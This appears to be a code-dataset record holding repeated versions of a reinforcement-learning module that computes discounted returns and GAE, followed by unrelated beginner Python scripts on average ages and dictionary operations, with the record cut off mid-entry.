Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
"""
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
def calc_gammas(batch, gamma):
"""Calculate the gammas to the right power for multiplication with rewards"""
news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])
gammas = torch.empty_like(news)
cur_gamma = 1.0
for t, new in enumerate(news):
cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma
gammas[t] = cur_gamma
return gammas
def calc_nstep_returns(batch, gamma, n, v_preds):
"""
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
"""
rets = calc_returns(batch, gamma)
rets_len = len(rets)
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(
), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
"""
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
"""
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from slm_lab.lib import logger, util
import numpy as np
import torch
import pydash as ps
logger = logger.get_logger(__name__)
def calc_returns(batch, gamma):
"""
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
"""
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
def calc_gammas(batch, gamma):
"""Calculate the gammas to the right power for multiplication with rewards"""
news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])
gammas = torch.empty_like(news)
cur_gamma = 1.0
for t, new in enumerate(news):
cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma
gammas[t] = cur_gamma
return gammas
def calc_nstep_returns(batch, gamma, n, v_preds):
"""
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
"""
rets = calc_returns(batch, gamma)
rets_len = len(rets)
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(
), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
"""
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
"""
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
<|reserved_special_token_1|>
'''
Calculations used by algorithms
All calculations for training share a standard API: take in `batch` from the algorithm.sample() method and return an np array for the calculation.
`batch` is a dict containing keys to any data type you wish, e.g. {rewards: np.array([...])}
'''
from slm_lab.lib import logger, util
import numpy as np
import torch
import pydash as ps
logger = logger.get_logger(__name__)
# Policy Gradient calc
# advantage functions
def calc_returns(batch, gamma):
'''
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
'''
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
# handle epi-end, to not sum past current episode
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
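# Illustrative check (commented out; the exact tensor dtypes depend on how the
# lab builds `batch`). With gamma=0.5 and an episode boundary after step 2:
# _batch = {'rewards': np.array([1., 1., 1.]), 'dones': torch.tensor([0., 1., 0.])}
# calc_returns(_batch, 0.5)  # -> tensor([1.5, 1.0, 1.0]) (hand-checked)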
def calc_gammas(batch, gamma):
'''Calculate the gammas to the right power for multiplication with rewards'''
news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])
gammas = torch.empty_like(news)
cur_gamma = 1.0
for t, new in enumerate(news):
cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma
gammas[t] = cur_gamma
return gammas
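# Worked example (hand-checked): for batch['dones'] = tensor([0., 1., 0.]) and
# gamma = 0.5, news = [1., 0., 1.], so the discount power resets at each episode start:
# calc_gammas(_batch, 0.5)  # -> tensor([1.0, 0.5, 1.0])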
def calc_nstep_returns(batch, gamma, n, v_preds):
'''
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
'''
rets = calc_returns(batch, gamma)
rets_len = len(rets)
# to subtract by offsetting n-steps
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
# to add back the subtracted with v_pred at n
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
'''
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
'''
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
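# Worked example (hand-checked, critic values hypothetical): a single 3-step
# rollout with a terminal bootstrap of 0.0 for the last next-state value.
# _rewards = np.array([1., 1., 1.])
# _v, _next_v = [0.9, 0.8, 0.7], [0.8, 0.7, 0.0]
# calc_gaes(_rewards, _v, _next_v, 0.5, 0.9)  # -> approx. tensor([0.8083, 0.6850, 0.3000])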
|
flexible
|
{
"blob_id": "07095bc815f5342b66ef4ca74b769321f3ef2ec5",
"index": 7240,
"step-1": "<mask token>\n\n\ndef calc_returns(batch, gamma):\n \"\"\"\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n \"\"\"\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\n<mask token>\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n \"\"\"\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n \"\"\"\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(\n ), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n \"\"\"\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n \"\"\"\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-2": "<mask token>\n\n\ndef calc_returns(batch, gamma):\n \"\"\"\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n \"\"\"\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\ndef calc_gammas(batch, gamma):\n \"\"\"Calculate the gammas to the right power for multiplication with rewards\"\"\"\n news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])\n gammas = torch.empty_like(news)\n cur_gamma = 1.0\n for t, new in enumerate(news):\n cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma\n gammas[t] = cur_gamma\n return gammas\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n \"\"\"\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n \"\"\"\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(\n ), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n \"\"\"\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n \"\"\"\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-3": "<mask token>\nlogger = logger.get_logger(__name__)\n\n\ndef calc_returns(batch, gamma):\n \"\"\"\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n \"\"\"\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\ndef calc_gammas(batch, gamma):\n \"\"\"Calculate the gammas to the right power for multiplication with rewards\"\"\"\n news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])\n gammas = torch.empty_like(news)\n cur_gamma = 1.0\n for t, new in enumerate(news):\n cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma\n gammas[t] = cur_gamma\n return gammas\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n \"\"\"\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n \"\"\"\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(\n ), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n \"\"\"\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n \"\"\"\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-4": "<mask token>\nfrom slm_lab.lib import logger, util\nimport numpy as np\nimport torch\nimport pydash as ps\nlogger = logger.get_logger(__name__)\n\n\ndef calc_returns(batch, gamma):\n \"\"\"\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n \"\"\"\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\ndef calc_gammas(batch, gamma):\n \"\"\"Calculate the gammas to the right power for multiplication with rewards\"\"\"\n news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])\n gammas = torch.empty_like(news)\n cur_gamma = 1.0\n for t, new in enumerate(news):\n cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma\n gammas[t] = cur_gamma\n return gammas\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n \"\"\"\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n \"\"\"\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(\n ), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n \"\"\"\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n \"\"\"\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-5": "'''\nCalculations used by algorithms\nAll calculations for training shall have a standard API that takes in `batch` from algorithm.sample() method and return np array for calculation.\n`batch` is a dict containing keys to any data type you wish, e.g. {rewards: np.array([...])}\n'''\nfrom slm_lab.lib import logger, util\nimport numpy as np\nimport torch\nimport pydash as ps\n\nlogger = logger.get_logger(__name__)\n\n# Policy Gradient calc\n# advantage functions\n\n\ndef calc_returns(batch, gamma):\n '''\n Calculate the simple returns (full rollout) for advantage\n i.e. sum discounted rewards up till termination\n '''\n rewards = batch['rewards']\n assert not np.any(np.isnan(rewards))\n # handle epi-end, to not sum past current episode\n not_dones = 1 - batch['dones']\n T = len(rewards)\n rets = np.empty(T, 'float32')\n future_ret = 0.0\n for t in reversed(range(T)):\n future_ret = rewards[t] + gamma * future_ret * not_dones[t]\n rets[t] = future_ret\n rets = torch.from_numpy(rets).float()\n return rets\n\n\ndef calc_gammas(batch, gamma):\n '''Calculate the gammas to the right power for multiplication with rewards'''\n news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])\n gammas = torch.empty_like(news)\n cur_gamma = 1.0\n for t, new in enumerate(news):\n cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma\n gammas[t] = cur_gamma\n return gammas\n\n\ndef calc_nstep_returns(batch, gamma, n, v_preds):\n '''\n Calculate the n-step returns for advantage\n see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf\n i.e. for each timestep t:\n sum discounted rewards up till step n (0 to n-1 that is),\n then add v_pred for n as final term\n '''\n rets = calc_returns(batch, gamma)\n rets_len = len(rets)\n # to subtract by offsetting n-steps\n tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]\n\n # to add back the subtracted with v_pred at n\n gammas = calc_gammas(batch, gamma)\n final_terms = gammas * v_preds\n final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]\n\n nstep_rets = rets - tail_rets + final_terms\n assert not np.isnan(nstep_rets).any(), f'N-step returns has nan: {nstep_rets}'\n return nstep_rets\n\n\ndef calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):\n '''\n Calculate GAE\n See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.\n v_preds are values predicted for current states\n next_v_preds are values predicted for next states\n NOTE for standardization trick, do it out of here\n '''\n T = len(rewards)\n assert not np.any(np.isnan(rewards))\n assert T == len(v_preds)\n gaes = np.empty(T, 'float32')\n future_gae = 0.0\n for t in reversed(range(T)):\n delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]\n gaes[t] = future_gae = delta + gamma * lam * future_gae\n assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'\n gaes = torch.from_numpy(gaes).float()\n return gaes\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# the age of some survivors
survived_age = [48.0, 15.0, 40.0, 36.0, 47.0, \
32.0, 60.0, 31.0, 17.0, 36.0, 39.0, 36.0, 32.5, \
39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, \
16.0, 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, \
1.0, 19.0, 24.0, 33.0, 43.0, 24.0, 32.0, 49.0, \
30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, \
36.0, 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, \
28.0, 40.0, 22.0, 33.0, 35.0, 24.0, 28.0, 17.0, 16.0, 48.0]
# the age of some victims
non_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, \
24.0, 36.0, 45.5, 45.0, 46.0, 57.0, 25.0, 58.0, \
46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0, \
47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, \
29.0, 40.0, 19.0, 65.0, 50.0, 54.0, 36.5, 31.0]
# average age of survivors
ave_survived_age = sum(survived_age)/len(survived_age)
# round to two decimal places
ave_survived_age = round(ave_survived_age,2)
# average age of victims
ave_non_survived_age = sum(non_survived_age)/len(non_survived_age)
ave_non_survived_age = round(ave_non_survived_age,2)
print("The ave_age of survivors is {}".format(ave_survived_age))
print("The ave_age of victims is {}".format(ave_non_survived_age))
# The ave_age of survivors is 31.71
# The ave_age of victims is 42.65
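# Cross-check sketch (not in the original) using the standard library:
# import statistics
# print(round(statistics.mean(survived_age), 2))      # 31.71
# print(round(statistics.mean(non_survived_age), 2))  # 42.65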
|
normal
|
{
"blob_id": "85c51f155439ff0cb570faafc48ac8da094515bf",
"index": 3362,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('The ave_age of survivors is {}'.format(ave_survived_age))\nprint('The ave_age of victims is {}'.format(ave_non_survived_age))\n",
"step-3": "survived_age = [48.0, 15.0, 40.0, 36.0, 47.0, 32.0, 60.0, 31.0, 17.0, 36.0,\n 39.0, 36.0, 32.5, 39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, 16.0,\n 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, 1.0, 19.0, 24.0, 33.0, 43.0, \n 24.0, 32.0, 49.0, 30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, 36.0,\n 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, 28.0, 40.0, 22.0, 33.0, 35.0, \n 24.0, 28.0, 17.0, 16.0, 48.0]\nnon_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, 24.0, 36.0, 45.5, 45.0, \n 46.0, 57.0, 25.0, 58.0, 46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0,\n 47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, 29.0, 40.0, 19.0, 65.0, \n 50.0, 54.0, 36.5, 31.0]\nave_survived_age = sum(survived_age) / len(survived_age)\nave_survived_age = round(ave_survived_age, 2)\nave_non_survived_age = sum(non_survived_age) / len(non_survived_age)\nave_non_survived_age = round(ave_non_survived_age, 2)\nprint('The ave_age of survivors is {}'.format(ave_survived_age))\nprint('The ave_age of victims is {}'.format(ave_non_survived_age))\n",
"step-4": "# the age of some survivors\nsurvived_age = [48.0, 15.0, 40.0, 36.0, 47.0, \\\n32.0, 60.0, 31.0, 17.0, 36.0, 39.0, 36.0, 32.5, \\\n39.0, 38.0, 36.0, 52.0, 29.0, 35.0, 35.0, 49.0, \\\n16.0, 27.0, 22.0, 27.0, 35.0, 3.0, 11.0, 36.0, \\\n1.0, 19.0, 24.0, 33.0, 43.0, 24.0, 32.0, 49.0, \\\n30.0, 49.0, 60.0, 23.0, 26.0, 24.0, 40.0, 25.0, \\\n36.0, 48.0, 21.0, 29.0, 24.0, 44.0, 41.0, 2.0, \\\n28.0, 40.0, 22.0, 33.0, 35.0, 24.0, 28.0, 17.0, 16.0, 48.0]\n\n# the age of some victims\nnon_survived_age = [47.0, 55.0, 36.0, 38.0, 19.0, \\\n24.0, 36.0, 45.5, 45.0, 46.0, 57.0, 25.0, 58.0, \\\n46.0, 50.0, 56.0, 58.0, 62.0, 64.0, 39.0, 21.0, \\\n47.0, 45.0, 18.0, 70.0, 2.0, 36.0, 61.0, 47.0, \\\n29.0, 40.0, 19.0, 65.0, 50.0, 54.0, 36.5, 31.0]\n\n# average age of survivors\nave_survived_age = sum(survived_age)/len(survived_age)\n\n# take two decimal places\nave_survived_age = round(ave_survived_age,2)\n\n# average age of victims\nave_non_survived_age = sum(non_survived_age)/len(non_survived_age)\n\nave_non_survived_age = round(ave_non_survived_age,2)\n\nprint(\"The ave_age of survivors is {}\".format(ave_survived_age))\nprint(\"The ave_age of victims is {}\".format(ave_non_survived_age))\n\n# The ave_age of survivors is 31.71\n# The ave_age of victims is 42.65\n\n\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python3
# encoding: utf-8
"""
@version: ??
@author: ami
@license: Apache Licence
@file: dictTest.py
@time: 2019/9/25 18:26
@tools: PyCharm
"""
def func():
pass
class Main():
def __init__(self):
pass
if __name__ == '__main__':
pass
d = {'name': 'Bob', 'age': 40}
print(d)
d = {'spam': 2, 'ham': 1, 'eggs': 3}
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
print(i)
d['ham'] = ['grill', 'bake', 'fry']
print(d)
del d['eggs']
print(d)
d['brunch'] = 'Bacon'
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
d2 = {'toast': 4, 'muffin': 5}
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
table = {
'1975': 'Holy Grail',
'1979': 'Life of Brain',
'1983': 'The Meaning of Life'
}
year = '1983'
movie = table[year]
print(movie)
for year in table:
print(year + '\t' + table[year])
table2 = {
'Holy Grail': '1975',
'Life of Brain': '1979',
'The Meaning of Life': '1983'
}
print(table2['Holy Grail'])
print(list(table2.items()))
year_ = [title for (title, year) in table2.items() if year == '1975']
print(year_)
K = 'Holy Grail'
print(table2[K])
V = '1975'
key = [key for (key, value) in table2.items() if value == V]
print(key)
key = [key for key in table2.keys() if table2[key] == V]
print(key)
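# If the mapping is one-to-one, the whole reverse table can be built at once;
# a hedged alternative to the per-value comprehensions above:
inv = {value: key for (key, value) in table2.items()}
print(inv['1975'])  # Holy Grail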
Matrix = {}
Matrix[(2, 3, 4)] = 88
Matrix[(7, 8, 9)] = 99
X = 2
Y = 3
Z = 4
z_ = Matrix[(X, Y, Z)]
print(z_)
print(Matrix)
if (2, 3, 6) in Matrix:
print(Matrix[(2, 3, 6)])
else:
print(0)
try:
print(Matrix[(2, 3, 6)])
except KeyError:
print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
rec = {}
rec['name'] = 'Bob'
rec['age'] = 40.5
rec['job'] = 'developer/manager'
print(rec['name'])
rec = {
'name': 'Bob',
'jobs': ['developer', 'manager'],
'web': 'www.bobs.org/?Bob',
'home': {'state': 'Overworked', 'zip': 12345}
}
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
db = []
other = {
'name': 'other',
'jobs': ['hr', 'manager'],
'web': 'www.hr.org',
'home': {'state': 'Overworked', 'zip': 55555}
}
db.append(rec)
db.append(other)
print(db[0]['jobs'])
db = {}
db['bob'] = rec
db['sue'] = other
print(db['bob']['jobs'])
age_ = {'name': 'Bob', 'age': 40}
print(age_)
d = {}
d['name'] = 'sue'
d['age'] = 50
print(d)
di = dict(name='Bob', age=56)
print(di)
di = dict([('name', 'Bob'), ('age', 55)])
print(di)
fromkeys = dict.fromkeys(['a', 'b'], 0)
print(fromkeys)
iterator = zip(['a', 'b', 'c'], [1, 2, 3])
print(iterator)
d = dict(zip(['a', 'b', 'c'], [1, 2, 3]))
print(d)
d = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}
print(d)
d = {x: x ** 2 for x in [1, 2, 3, 4]}
print(d)
d2 = {x: x ** 2 for x in range(4)}
print(d2)
d = {c: c * 4 for c in 'SPAM'}
print(d)
d = {c.lower(): c + '!' for c in ['spam', 'eggs', 'ham']}
print(d)
d = dict.fromkeys(['a', 'b', 'c'], 0)
print(d)
d = {k: 0 for k in ['a', 'b', 'c']}
print(d)
d = dict.fromkeys('spam')
print(d)
d = dict.fromkeys('spam', 0)
print(d)
d = {k: None for k in 'spam'}
print(d)
d = dict(a=1, b=2, c=3)
print(d)
k = d.keys()
print(k)
# print(k[0])  # would raise TypeError: 'dict_keys' object is not subscriptable
print(list(k)[0])
v = d.values()
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys(): print(k)
for key in d: print(key)
# Sorting the keys of {'a': 1, 'b': 2, 'c': 3}
print(d)
Ks = d.keys()
print(Ks)
Ks = list(Ks)
Ks.sort()
print(Ks)
for k in Ks: print(k, d[k])
print("-------"*6)
D = {'b': 2, 'c': 3, 'a': 1}
Ks = D.keys()
for k in sorted(Ks): print(k, D[k])
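# Equivalent shorter forms (sketch): iterating a dict yields its keys directly,
# and items() can be sorted as pairs.
for k in sorted(D): print(k, D[k])
print(sorted(D.items()))  # [('a', 1), ('b', 2), ('c', 3)]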
|
normal
|
{
"blob_id": "797cedc9dc2a47713b9554e4f5975a4505ecf6d3",
"index": 9568,
"step-1": "<mask token>\n\n\nclass Main:\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\n<mask token>\n",
